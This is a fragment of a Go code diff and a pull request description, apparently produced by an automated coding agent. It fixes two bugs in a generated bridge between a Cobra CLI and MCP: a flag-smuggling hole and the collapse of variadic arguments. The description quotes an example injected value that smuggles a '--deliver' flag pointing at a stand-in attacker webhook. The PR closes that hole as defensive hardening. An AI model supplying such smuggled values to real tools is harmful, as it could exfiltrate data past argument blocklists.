 		// Collapse repeats of the same name (e.g. "<slug> [<slug>...]") into a
 		// single positional slot; distinct-index dedup happens downstream.
 		if seenPositional[inputName] {
+			if variadic {
+				for i := range out {
+					if out[i].InputName == inputName {
+						out[i].Variadic = true
+						break
+					}
+				}
+			}
 			continue
 		}
 		seenPositional[inputName] = true
@@ -183,6 +193,7 @@ func positionalArgsForCommand(cmd *cobra.Command, blocked map[string]bool) []pos
 			InputName: inputName,
 			Display:   raw,
 			Required:  required,
+			Variadic:  variadic,
 		})
 	}
 	return out


### PR DESCRIPTION
<!-- CURSOR_AGENT_PR_BODY_BEGIN -->
## Intent

Close two P1 cobratree MCP-bridge bugs on current main.

Closes #4643
Closes #4644

## Approach

Both bugs live in the generated Cobra↔MCP shell-out path.

**Flag smuggling (#4643):** `cliArgsFromMCP` filtered MCP argument keys, then emitted surviving pairs as two argv tokens (`--key`, `value`). A Cobra bool flag does not consume the next token, so a value that starts with `--` was parsed as its own flag — one the key-only blocklist never saw. Proven shape: `{"json": "--deliver=webhook:https://attacker.example/"}` became `--json --deliver=...`.

Value-carrying branches now emit one argv element (`--key=value`). Bools stay bare `--flag`. pflag then either treats the payload as a string value or rejects it on a bool flag; it cannot re-parse the value as a second flag.

**Variadic collapse (#4644):** `positionalArgsFromRawArgsField` treated `len(positionals) == 1` as “keep the raw string as one token.” A single variadic descriptor such as `[event-id...]` is still one descriptor, so `args: "101 202"` collapsed to `["101 202"]`.

Positional discovery now records `Variadic` (including collapsed `<slug> [<slug>...]`). Raw args split via `SplitShellArgs` when that flag is set. A true scalar single positional still stays one token.

## Scope

Primary area: generated cobratree MCP mirror (`internal/generator/templates/cobratree/`).

Why this belongs in this repo: every printed CLI’s MCP server inherits this shape. A printed-CLI hand-fix would be overwritten on reprint.

## Risk

- MCP structured flags now reach the companion CLI as `--flag=value` instead of `--flag value`. pflag accepts both; bools are unchanged.
- Raw `args` for a single variadic positional now split on shell words. Scalar free-text positionals (e.g. `<query>`) keep spaces as one token.
- Destination/root blocklist behavior is unchanged except that values can no longer introduce a second flag token.

## Output Contract

Generator emits joined `--key=value` argv for non-bool MCP flags and a `Variadic` field on positional descriptors. Evidence:

- Emitted-code assertions plus compiled generated CLI tests in `TestGeneratedMCPJoinsFlagValuesAndSplitsVariadicRawArgs`
- Generated cobratree tests: smuggle regression (split argv sets `--deliver`, joined argv cannot), variadic split, scalar whitespace, structured-then-raw overflow, argv-capturing child
- Golden fixtures for `generate-golden-api` cobratree artifacts, updated in this PR

## Verification

- [x] Generator/template change: verified generated output, including emitted-code assertions or compiled generated CLI output
- [x] Generator/template change: covered the affected fallback or variant shape, not only happy-path fixtures
- [x] Generator/template change: checked emitted definitions and call sites for matching gates

Commands run:

- `go test ./internal/generator -timeout 20m` — pass
- `go test` for the remaining packages — pass
- `bash scripts/golden.sh verify` — 39/39 pass
- `bash scripts/verify-generator-output.sh` — 13/13 pass
- `go build -o ./cli-printing-press ./cmd/cli-printing-press` — pass
- `go fmt ./...` — no further diffs

Main CI `build-and-test`, `full-golden`, and `generated-output-compile` are green on this head. `ready-to-merge` is intentionally not applied.

## AI / Automation Disclosure

- [ ] No AI or automation was used
- [ ] Human-reviewed: AI or automation was used, and a human reviewed the work for intent, fit, and obvious issues before submission
- [ ] AI-reviewed only: an AI agent reviewed the work, but no human reviewed it before submission
- [x] Fully automated: generated and submitted without human review for this specific change

<!-- CURSOR_AGENT_PR_BODY_END -->

<div><a href="https://cursor.com/agents/bc-2b848a3d-ad77-4265-9105-b7cd6dcf161c?cursor_ref=pr_footer&cursor_cta=open_in_web"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-web-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-web-light.png"><img alt="Open in Web" width="114" height="28" src="https://cursor.com/assets/images/open-in-web-dark.png"></picture></a>&nbsp;<a href="https://cursor.com/background-agent?bcId=bc-2b848a3d-ad77-4265-9105-b7cd6dcf161c&cursor_ref=pr_footer&cursor_cta=open_in_cursor"><picture><source media="(prefers-color-scheme: dark)" srcset="https://cursor.com/assets/images/open-in-cursor-dark.png"><source media="(prefers-color-scheme: light)" srcset="https://cursor.com/assets/images/open-in-cursor-light.png"><img alt="Open in Cursor" width="131" height="28" src="https://cursor.com/assets/images/open-in-cursor-dark.png"></picture></a>&nbsp;</div>

